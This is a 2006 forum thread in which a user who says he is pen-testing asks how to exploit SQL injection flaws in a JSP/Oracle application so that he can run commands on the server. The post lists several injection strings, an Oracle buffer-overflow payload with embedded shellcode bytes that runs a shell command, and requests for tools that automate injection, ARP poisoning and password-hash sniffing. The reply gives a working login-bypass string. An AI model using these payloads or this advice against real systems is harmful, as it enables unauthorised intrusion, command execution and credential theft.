|
Title: Oracle SQL Injection help... Post by: zgrp on April 12, 2006, 01:53:37 AM Hello,
This is my first post at this community, wait I can help other too. I'm pen-testing a host where have applications running in JSP and Oracle as a back-end, I found 2 SQL Injections in this application, but I'm not been able to exploit it... if some Oracle SQL Injection master can help me :( The two scripts is like that: One is a login form. Two is a search form, where one of the options (the city field) is vulnerable, so I belive it's a injection in a WHERE clause. My objetive is use the Oracle database to execute commands in the Server (I don't care about data in the database). If I try in the one (login form) the following strings (Reference http://www.securityfocus.com/infocus/1644): ;select username from all_users where ''x''=''x' or exists (select 1 from sys.dual) and ''x''=''x' union select username from all_users where ''x''=''x' or ''x''=''x'' --' I get: ORA-01756: quoted string not properly terminated If I try in the one (login form) the following strings (Reference http://www.appsecinc.com/presentations/oracle_security.pdf): UNION select password from DBA_USERS where 'q' = 'q' I got: ORA-00907: missing right parenthesis What already appear better, since know appear it have a "parenthesis" unterminated. If I try in the one (login form) the following strings (Reference http://seclists.org/lists/pen-test/2001/Dec/0036.html) (SELECT username FROM all_users WHERE 1=1) I got a html access denied message (like when i type a wring user or pass), appear that subselects doesn't work. ') UNION SELECT username FROM all_users WHERE (''=' I got: ORA-00904: invalid column name However all_users is a valid table and username is a vaile colomn. :( 1 - Why this happen? Someone know ? How can I fix it ? I gained access to the host by other attack, and compromissed the database, and just for curious, I checked it, and it really exist: USERNAME SYS SYSTEM OUTLN WMSYS ORDSYS ORDPLUGINS MDSYS CTXSYS XDB ANONYMOUS WKSYS WKPROXY ... ... I also find a intersting reference (http://security-papers.globint.com.ar/oracle_security/AdvancedSQLInjectionInOracleDatabases.pdf) where the guy show possibility of execute overflow via SQL Injections, with a string like that for example: A'||TO_CHAR(MDSYS.MD2.SDO_CODE_SIZE('AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'||CHR(131)||CHR(195)||CHR(9)||CHR(255)||CHR(227)||CHR(251)||CHR(90)||CHR(227)||CHR(120)||CHR(54)||CHR(141)||CHR(67)||CHR(19)||CHR(80)||chr(184)||chr(191)||chr(142)||chr(01)||chr(120)||chr(255)||chr(208)||chr(184)||chr(147)||chr(131)||chr(00)||chr(120)||chr(255)||chr(208)||'dir>c:\dir.txt'))-- 2 - If I try it, I got a ORA-00907: missing right parenthesis, someone know how could I use it in my example ? 3 - Even if it worked, he redirect the output to c:\dir.txt, can't it be sent to stdout (web page return from query) ? 4 - Someone know a tool, that for example, I find a SQL Injection, and pass it to the tool, and it make several trys, to detect the right way to make the querys ? :) ps: Out of topic, someone already had success (or know how to) compile programs that use raw sockets/libpcap/libnet with cygwin (Like compile dsniff, ettercap,...) ? ps2: Or do you know a good password in command line for windows (that can be totally installed via command line) and make arp poison and filter passwords hash like ntlm, oracle, sql server, etc? Thank you a lot. Cya Title: Re: Oracle SQL Injection help... Post by: pcsneaker on April 12, 2006, 05:58:44 AM That's a lot of different things you're trying to do.
Start with the most basic: You said that you want to exploit a login form. The query contructed by a login form usually is something like: Quote select * from users where username =' Content of Textbox1' and password = 'Content of Textbox2' You mentioned that you tried to enter Quote or ''x''=''x'' --' and get the error ORA-01756: quoted string not properly terminated. With your input the query will be: Quote select * from users where username =' or ''x''=''x'' --'' If you modify your input slightly 2 single quotes ^^ and password = 'Content of Textbox2' ' or 1=1 -- that will give you Quote select * from users where username ='' or 1=1 --' Now everything after the second '1' should be ignored and your query should work.2 single quotes ^^ and password = 'Content of Textbox2' Hint: Try to figure out the query constructed by the form you want to exploit, write it down and look at it after modifying by your input...
Powered by SMF 1.1.18 |
SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com |